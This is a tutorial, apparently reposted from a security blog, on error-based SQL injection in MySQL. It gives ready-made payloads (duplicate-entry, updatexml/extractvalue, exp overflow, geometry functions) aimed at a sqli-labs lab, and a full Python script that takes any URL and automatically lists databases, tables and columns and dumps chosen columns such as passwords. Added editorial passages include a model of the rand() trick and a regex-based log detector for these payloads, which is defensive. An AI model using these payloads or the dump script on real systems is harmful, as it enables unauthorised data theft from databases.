SQL blind injection: error-based injection (with automation script)

Author: __LSA__
0x00 Overview
When pentesting, injection is always the first thing tested. SQL injection can be called the boss of web vulnerabilities and firmly holds first place in the OWASP list. Ordinary injection that directly echoes data is now almost extinct; the vast majority of cases are blind injection. This article is the first in a series on blind injection and introduces error-based injection.
0x01 How error-based injection works
There are actually many kinds of error-based injection; this article covers several common ways of raising an error, and new techniques will be added in later updates.
1. Duplicate entry error:
In one sentence: repeated queries insert a duplicate key value, which makes count() fail, and the error message carries the sensitive information.
The key point is that the query builds a temporary table to hold the grouped data. If a key value is absent it is inserted, and group by causes rand() to be evaluated once more before the insert; if the key is already present, its count is simply increased by 1. The principle is walked through below with rand(0):
First, the functions used in what follows:
Count(): counts the total number of rows
Concat(): concatenates strings
Floor(): rounds down to an integer
Rand(): produces a random number between 0 and 1
The rand(0) sequence, i.e. the successive values of floor(rand(0)*2), is 011011.
1. Query the first record: rand(0) gives key 0, which is not in the temporary table, so an insert is performed; rand(0) is evaluated again and gives 1, so 1 is inserted.
2. Query the second record: rand(0) gives 1; key 1 exists in the temporary table, so its count is increased to 2.
3. Query the third record: rand(0) gives 0; key 0 is not in the temporary table, so an insert is performed, rand(0) is evaluated again and gives key 1; 1 already exists in the temporary table, and since keys must be unique, an error is raised.
From the above, the table must contain at least 3 records for the error to occur, and testing confirms this.
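As an added illustration (not from the original post), the following Python model replays the temporary-table logic just described with the rand(0) bit sequence 011011 taken as given; MySQL's seeded generator is not reproduced, and the leaked value "LEAK" and the '&' separator (0x26 in the payloads) are constructed placeholders.

```python
from itertools import cycle

# floor(rand(0)*2) for the first six calls, as quoted in the text (taken as given;
# MySQL's seeded generator itself is not reproduced here)
RAND0_BITS = [0, 1, 1, 0, 1, 1]


def group_by_rand_key(row_count, leak="LEAK", bits=RAND0_BITS):
    """Model the GROUP BY temp table for the key concat(leak, 0x26, floor(rand(0)*2)).

    Returns (counts, error): counts is the temp table, error is the simulated
    MySQL message or None.  rand() is evaluated once to look the key up and,
    only if the key is absent, once more when the row is actually inserted.
    """
    draw = cycle(bits)
    counts = {}
    for row in range(1, row_count + 1):
        key = "%s&%d" % (leak, next(draw))      # first evaluation: lookup
        if key in counts:
            counts[key] += 1                     # key present: just count it
            continue
        key = "%s&%d" % (leak, next(draw))      # second evaluation: insert
        if key in counts:                        # unique-key violation
            return counts, "Duplicate entry '%s' for key 'group_key' (row %d)" % (key, row)
        counts[key] = 1
    return counts, None


def min_rows_to_error(bits=RAND0_BITS, limit=100):
    """Smallest table size at which the error fires for this rand() sequence."""
    for n in range(1, limit + 1):
        if group_by_rand_key(n, bits=bits)[1] is not None:
            return n
    return None
```

The error string is exactly where the leaked value ends up, between the opening quote and the '&' separator, which is also what the extraction regex in the script later on this page relies on.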
Some error-raising query statements (essentially formulas to plug values into):
Assume the number of columns is 3.
Classic statement:
union select 1,count(*),concat(version(),floor(rand(0)*2))x from information_schema.columns group by x;--+
version() can be replaced with whatever information needs to be queried.
Simplified statement:
union select 1,2,count(*) from information_schema.columns group by concat(version(),floor(rand(0)*2));--+
If the key table is blocked, this form can be used:
select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))
If rand is blocked, a user variable can be used to raise the error:
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
Sqli-labs less-5 test:
1. Get the database name:
192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+
2. Get the table names:
192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+
3. Get the column names:
192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+
4. Dump the data:
192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select password from users limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+
2. Xpath error:
The two main functions:
MySQL 5.1.5
1. updatexml(): queries and modifies XML
2. extractvalue(): queries and modifies XML
Both leak at most 32 characters per error.
and updatexml(1,concat(0x26,(version()),0x26),1);
and (extractvalue(1,concat(0x26,(version()),0x26)));
Sqli-labs less-5 test:
Updatexml():
192.168.43.173:8999/sqli-labs/less-5/?id=1' and updatexml(1,concat(0x26,database(),0x26),1);--+
Extractvalue():
192.168.43.173:8999/sqli-labs/less-5/?id=1' and extractvalue(1,concat(0x26,database(),0x26));--+
3. Integer overflow error:
MySQL > 5.5.5
Main function:
exp(x): computes e raised to the power x
Payload: and (EXP(~(select * from(select version())a)));
exp() overflows once its argument exceeds 710.
Bitwise negation of 0 returns "18446744073709551615", and a function that executes successfully returns 0, so negating a successfully executed function yields the largest unsigned BIGINT value, which then causes the error.
4. Duplicate data error:
Low MySQL versions
payload: select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x
5. Other errors:
GeometryCollection()
id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))
multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))
multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))
linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))
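Added here as a defender-side example (not from the original post): a small detector that maps the request target in web-server access-log lines to the error-based families listed above. The Common Log Format prefix, the family names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# One regex per error-based family described above, matched case-insensitively
# against the URL-decoded request target.
SIGNATURES = {
    "duplicate-entry": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "user-variable": re.compile(r"@\w+\s*:=", re.I),
    "xpath": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "bigint-overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    "name-const": re.compile(r"\bname_const\s*\(", re.I),
    "geometry": re.compile(
        r"\b(geometrycollection|polygon|multipoint|multilinestring|linestring|multipolygon)"
        r"\s*\(\s*\(?\s*select\b", re.I),
}

# Common Log Format prefix: client, ident, user, [timestamp] "METHOD target ..."
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')


def classify_request(raw_target):
    """Return the error-based families a request target matches (decoded first)."""
    decoded = unquote_plus(raw_target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_access_log(lines):
    """Return (client_ip, families) for every log line that hits a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        families = classify_request(m.group(2))
        if families:
            hits.append((m.group(1), families))
    return hits


# Constructed sample lines (not real traffic); lines 2-4 reuse payload shapes
# from the text above, the last one is a benign false-positive check.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Dec/2017:10:00:01 +0800] "GET /less-5/?id=1 HTTP/1.1" 200 720',
    '10.0.0.9 - - [22/Dec/2017:10:00:02 +0800] "GET /less-5/?id=1%27+union+select+1,count(*),'
    'concat(database(),0x26,floor(rand(0)*2))x+from+information_schema.columns+group+by+x;--+ HTTP/1.1" 200 742',
    '10.0.0.9 - - [22/Dec/2017:10:00:03 +0800] "GET /less-5/?id=1%27+and+updatexml(1,concat(0x26,database(),0x26),1);--+ HTTP/1.1" 200 739',
    '10.0.0.9 - - [22/Dec/2017:10:00:04 +0800] "GET /less-5/?id=1+AND+polygon((select+*+from(select+*+from(select+user())a)b)) HTTP/1.1" 200 731',
    '10.0.0.7 - - [22/Dec/2017:10:00:05 +0800] "GET /search?q=polygon+shapes HTTP/1.1" 200 500',
]
```

Running scan_access_log(SAMPLE_LOG) flags only the three requests from 10.0.0.9, one per family; decoding before matching matters because the payloads arrive with "+" and "%27" in place of spaces and quotes.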
0x02 Error-based injection script
An automated injection script written against sqli-labs less-5; in practice adjust it to the situation at hand. For blind injection a script is simply more convenient.
(Recommended to run under Linux: the Windows cmd cannot use termcolor, so on Windows comment it out and adjust the print calls. Colour output is pretty cool though!)
#coding:utf-8
#Author:LSA
#Description:blind sqli error base script
#Date:20171222
# Editor's note: the scraped copy had lost "requests.get(", the table name
# "information_schema.columns" (left as "lumns") and all indentation; these
# are restored below and the Python 2 print statements/xrange are updated to
# Python 3. Only the functions survived on the page; the original
# command-line entry point is not shown there.
import sys
import requests
import re
import binascii
from termcolor import colored
import optparse

fdata = []   # every extracted cell, filled column by column by dumpData()

# Every query below raises:  Duplicate entry '<value>&1' for key 'group_key'
# so the leaked value is read back from between the opening quote and the
# 0x26 ('&') separator with re.search(r'\'(.*?)&', html).


def judge_columns_num(url):
    # Raise "order by N" until the response length changes; the largest N
    # that kept the baseline length is the column count.
    rsp_true_content_length = None
    for i in range(1, 100):
        columns_num_url = url + '\'' + 'order by ' + str(i) + '--+'
        rsp = requests.get(columns_num_url)
        rsp_content_length = rsp.headers['content-length']
        if i == 1:
            rsp_true_content_length = rsp_content_length
            continue
        if rsp_content_length == rsp_true_content_length:
            continue
        else:
            print(colored('column nums is ' + str(i-1), "green", attrs=["bold"]))
            columns_num = i - 1
            return columns_num


def getDatabases(url):
    dbs_url = url + "' union select 1,count(*),concat((select count(distinct+table_schema) from information_schema.tables),0x26,floor(rand(0)*2))x from information_schema.tables group by x;--+"
    dbs_html = requests.get(dbs_url).text
    dbs_num = int(re.search(r'\'(\d*?)&', dbs_html).group(1))
    print("databases num:" + colored(str(dbs_num), "green", attrs=["bold"]))
    dbs = []
    print("dbs name: ")
    for dbIndex in range(0, dbs_num):
        db_name_url = url + "' union select 1,count(*),concat((select distinct table_schema from information_schema.tables limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % dbIndex
        db_html = requests.get(db_name_url).text
        db_name = re.search(r'\'(.*?)&', db_html).group(1)
        dbs.append(db_name)
        print(colored("\t%s" % db_name, "green", attrs=["bold"]))
    return dbs


def getTables(url, db_name):
    #db_name_hex = "0x" + binascii.b2a_hex(db_name)
    tables_num_url = url + "' union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema='%s'),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % db_name
    tables_html = requests.get(tables_num_url).text
    tables_num = int(re.search(r'\'(\d*?)&', tables_html).group(1))
    print("databases %s,tables num: %d" % (db_name, tables_num))
    print("tables name: ")
    tables = []
    for tableIndex in range(0, tables_num):
        table_name_url = url + "'union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name, tableIndex)
        table_html = requests.get(table_name_url).text
        table_name = re.search(r'\'(.*?)&', table_html).group(1)
        tables.append(table_name)
        print(colored("\t%s" % table_name, "green", attrs=["bold"]))
    return tables


def getColumns(url, db_name, table_name):
    #db_name_hex = "0x" + binascii.b2a_hex(db_name)
    #table_name_hex = "0x" + binascii.b2a_hex(table_name)
    dataColumns_num_url = url + "' union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema='%s' and table_name='%s' ),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name, table_name)
    dataColumns_html = requests.get(dataColumns_num_url).text
    dataColumns_num = int(re.search(r'\'(\d*?)&', dataColumns_html).group(1))
    print("table: %s,dataColumns num: %d" % (table_name, dataColumns_num))
    print("DataColumns name:")
    columns = []
    for dataColumnIndex in range(0, dataColumns_num):
        dataColumn_name_url = url + "' union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name, table_name, dataColumnIndex)
        dataColumn_html = requests.get(dataColumn_name_url).text
        dataColumn_name = re.search(r'\'(.*?)&', dataColumn_html).group(1)
        columns.append(dataColumn_name)
        print(colored("\t\t%s" % dataColumn_name, "green", attrs=["bold"]))
    return columns


def dumpData(url, db_name, table_name, inputColumns_name):
    #db_name_hex = "0x" + binascii.b2a_hex(db_name)
    #table_name_hex = "0x" + binascii.b2a_hex(table_name)
    dataColumns_num_url = url + "' union select 1,count(*),concat((select count(*) from %s.%s),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name, table_name)
    data_html = requests.get(dataColumns_num_url).text
    datas = int(re.search(r'\'(\d*?)&', data_html).group(1))
    inputColumns = inputColumns_name.split(',')   # comma-separated column list
    print(colored("Total datas: " + str(datas), "green", attrs=["bold"]))
    print(str(inputColumns_name) + ":")
    for inputColumnIndex in range(0, len(inputColumns)):
        for dataIndex in range(0, datas):
            dataColumn_name_url = url + "' union select 1,count(*),concat((select %s from %s.%s limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (inputColumns[inputColumnIndex], db_name, table_name, dataIndex)
            data_html = requests.get(dataColumn_name_url).text
            data = re.search(r'\'(.*?)&', data_html).group(1)
            fdata.append(data)
            print(colored("\t%s" % data, "green", attrs=["bold"]))
    # print the collected cells again as a table: header row, then one row per record
    for inputc in range(0, len(inputColumns)):
        print(str(inputColumns[inputc]) + "\t", end="")
    print("")
    print("+++++++++++++++++++++++++++++++++++++++++++++++++")
    n = len(fdata) // len(inputColumns)   # rows per column
    for t in range(0, n):
        for d in range(t, len(fdata), n):
            print(colored(fdata[d], "green", attrs=["bold"]) + "\t", end="")
        print("")
    print("+++++++++++++++++++++++++++++++++++++++++++++++++")

Published on this site: 2024-09-21 21:52:26

Article link: https://www.17tex.com/xueshu/648677.html
